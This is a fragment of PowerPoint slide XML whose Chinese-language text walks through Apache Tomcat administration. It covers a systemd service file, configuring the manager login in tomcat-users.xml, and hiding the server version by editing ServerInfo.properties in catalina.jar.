            <a:ext cx="98757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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="9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8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为</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="9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systemctl</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="18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服务，在</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="1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sz="1800" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>usr/lib/systemd/system</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="180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404040"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>下创建文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>tomcat.service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18360" y="1944623"/>
            <a:ext cx="7204075" cy="3878579"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7204075" h="3878579">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7203948" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7203948" y="3878579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="387857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3191" y="1940420"/>
            <a:ext cx="7213600" cy="3888104"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7213600" h="3888104">
                <a:moveTo>
                  <a:pt x="7208367" y="3887520"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="3887520"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="3887279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955" y="3886606"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="3885552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="3884218"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3882758"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7208367" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="721313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877995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="3877995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="3882758"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7213130" y="3882758"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7212901" y="3884218"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7212215" y="3885552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7211161" y="3886606"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7209840" y="3887279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7208367" y="3887520"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7213600" h="38881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213600" h="3888104">
                <a:moveTo>
                  <a:pt x="720360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203605" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7203605" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7213600" h="3888104">
                <a:moveTo>
                  <a:pt x="7203605" y="3882758"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7203605" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7208367" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7213130" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7213130" y="3877995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7208367" y="3877995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7203605" y="3882758"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7213600" h="3888104">
                <a:moveTo>
                  <a:pt x="7213130" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7208367" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7203605" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7213130" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7213130" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7213600" h="3888104">
                <a:moveTo>
                  <a:pt x="9525" y="3882758"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="3877995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="3877995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="3882758"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7213600" h="3888104">
                <a:moveTo>
                  <a:pt x="7203605" y="3882758"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="3882758"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="3877995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7203605" y="3877995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7203605" y="3882758"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7213600" h="3888104">
                <a:moveTo>
                  <a:pt x="7213130" y="3882758"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7203605" y="3882758"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7208367" y="3877995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7213130" y="3877995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7213130" y="388275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6693" y="1966772"/>
            <a:ext cx="6636384" cy="377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522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# cd </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>/usr/lib/systemd/system  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t># vim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tomcat.service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tomcat.service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的内容如下</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="469900" marR="436943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[Unit]  Description=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-18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cat</a:t>
            </a:r>
            <a:endParaRPr sz="16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After=syslog.target network.target remote-fs.target nss-lookup.target  [Service]</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="469900" marR="3690620">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="006FC0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Type=forking  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PIDFile=/var/run/tomcat.pid</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="469900" marR="967105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ExecStart=/home/tomcat/tomcat8520/bin/daemon.sh start  ExecReload=/bin/kill -s HUP $MAINPID  ExecStop=/bin/kill -s QUIT</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600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$MAINPID</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="469900" marR="465074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PrivateT</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="160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006FC0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>p=true  [Install]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006FC0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>WantedBy=multi-user.target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3440" y="3811270"/>
            <a:ext cx="3718560" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3718559" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3718559" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3718559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316990" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1316990" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1316736" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131673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0773" y="459473"/>
            <a:ext cx="10124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修改</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-240" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="5" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>m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spc="-65" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>a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/>
              <a:t>服务器后台管理地址和管理账号密码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1316736" y="2874264"/>
            <a:ext cx="7157084" cy="1478280"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7157084" h="1478279">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7156704" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156704" y="1478280"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="147828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2633" y="2869869"/>
            <a:ext cx="7166609" cy="1487170"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7166609" h="1487170">
                <a:moveTo>
                  <a:pt x="7161301" y="1486852"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1486852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="1486623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955" y="1485950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="1484896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="1483563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1482089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477327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="1477327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1482089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166063" y="1482089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7165835" y="1483563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7165162" y="1484896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7164108" y="1485950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7162774" y="1486623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161301" y="1486852"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="148717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1487170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1487170">
                <a:moveTo>
                  <a:pt x="7156538" y="1482089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1477327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161301" y="1477327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156538" y="1482089"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="1487170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1487170">
                <a:moveTo>
                  <a:pt x="9525" y="1482089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1477327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1477327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1482089"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="1487170">
                <a:moveTo>
                  <a:pt x="7156538" y="1482089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="1482089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1477327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156538" y="1477327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156538" y="1482089"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="1487170">
                <a:moveTo>
                  <a:pt x="7166063" y="1482089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7156538" y="1482089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161301" y="1477327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166063" y="1477327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166063" y="1482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97723"/>
            <a:ext cx="7833995" cy="269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u="sng" spc="-1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http://192.168.117.136:8080/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配置文件：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tomcat-users.xml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/usr/local/tomcat8520/conf/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768985">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1745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Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>、修改配置文件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：开放用户名</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>密码配置段</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="7689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Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>、重启</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>tomcat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dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>访问</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" u="sng" spc="-1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http://192.168.117.136:8080/</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="959485" marR="3856354" indent="-190500">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0"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latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>#cd /usr/local/tomcat8520/bin  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>#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./shutdown.sh</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="9594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#./startup.sh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00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隐藏</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-240" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="5" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>m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spc="-65" dirty="0">
                <a:latin typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>a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/>
              <a:t>版本信息的方法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1316736" y="2874264"/>
            <a:ext cx="7157084" cy="1201420"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7157084" h="1201420">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7156704" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156704" y="1200912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="12009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2633" y="2869869"/>
            <a:ext cx="7166609" cy="1210310"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7166609" h="1210310">
                <a:moveTo>
                  <a:pt x="7161301" y="1209865"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1209865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="1209624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955" y="1208951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="1207897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="1206563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1205102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00340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="1200340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1205102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166063" y="1205102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7165835" y="1206563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7165162" y="1207897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7164108" y="1208951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7162774" y="1209624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161301" y="1209865"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="12103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1210310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1210310">
                <a:moveTo>
                  <a:pt x="7156538" y="1205102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1200340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161301" y="1200340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156538" y="1205102"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="1210310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1210310">
                <a:moveTo>
                  <a:pt x="9525" y="1205102"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1200340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1200340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1205102"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="1210310">
                <a:moveTo>
                  <a:pt x="7156538" y="1205102"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="1205102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1200340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156538" y="1200340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156538" y="1205102"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="1210310">
                <a:moveTo>
                  <a:pt x="7166063" y="1205102"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7156538" y="1205102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161301" y="1200340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166063" y="1200340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166063" y="120510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6736" y="4818888"/>
            <a:ext cx="7157084" cy="646430"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7157084" h="646429">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7156704" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156704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2633" y="4814709"/>
            <a:ext cx="7166609" cy="655955"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7166609" h="655954">
                <a:moveTo>
                  <a:pt x="7161301" y="655853"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="655853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="655624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955" y="654938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="653897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="652564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="651090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46328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="651090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166063" y="651090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7165835" y="652564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7165162" y="653897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7164108" y="654938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7162774" y="655624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161301" y="655853"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="6559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655954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655954">
                <a:moveTo>
                  <a:pt x="7156538" y="651090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646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161301" y="646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156538" y="651090"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="655954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655954">
                <a:moveTo>
                  <a:pt x="9525" y="651090"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="651090"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="655954">
                <a:moveTo>
                  <a:pt x="7156538" y="651090"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="651090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156538" y="646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156538" y="651090"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="655954">
                <a:moveTo>
                  <a:pt x="7166063" y="651090"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7156538" y="651090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161301" y="646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166063" y="646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166063" y="651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1470723"/>
            <a:ext cx="7833995" cy="394462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进入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lib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目录找到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catalina.jar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unzip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catalina.jar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之后会多出两个文件夹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进入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org/apache/catalina/util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编辑配置文件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ServerInfo.properties</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="768985">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1735"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>修改为</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="768985" marR="3164205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Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>server.info=Apache </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-35" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Tomcat  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>server.number=0.0.0.0  server.built=Nov </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>7 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>2017 20:05:27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UTC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768985" marR="4701540" indent="-756285">
              <a:lnSpc>
                <a:spcPct val="1582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将修改后的信息压缩回</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="235" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040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包 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>lib</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>目录下：</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="7689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jar uvf catalina.jar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org/apache/catalina/util/ServerInfo.properties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3816" y="3811270"/>
            <a:ext cx="3758565" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3758565" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3758184" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="375818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277620" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
